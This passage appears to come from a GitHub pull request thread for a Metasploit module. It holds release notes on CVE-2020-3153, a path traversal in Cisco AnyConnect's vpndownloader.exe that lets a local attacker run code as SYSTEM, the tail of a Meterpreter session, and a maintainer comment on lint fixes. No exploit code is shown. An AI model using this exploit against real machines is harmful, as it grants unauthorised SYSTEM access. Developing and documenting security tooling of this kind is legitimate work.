Meterpreter     : x86/windows
meterpreter >
```

2020-06-24 22:50 UTC, merged

2020-06-24 22:54 UTC, gwillcox-r7 commented
# Release Notes

This PR adds support for CVE-2020-3153, a path/directory traversal vulnerability within `vpndownloader.exe` on Cisco AnyConnect Secure Mobility Client for Windows versions prior to 4.8.02042. Local attackers who successfully exploit this vulnerability will gain arbitrary code execution as the SYSTEM user on affected machines.

2020-06-24 23:05 UTC, gwillcox-r7 commented
@cdelafuente-r7 Ended up doing a quick ninja patch in https://github.com/rapid7/metasploit-framework/commit/15de51062312bf30cdc5a713203231f4c10c660d as we hadn't applied `msftidy_docs.rb` fixes nor `rubocop` fixes. That commit fixed those up. Otherwise everything else was the same and looked good :)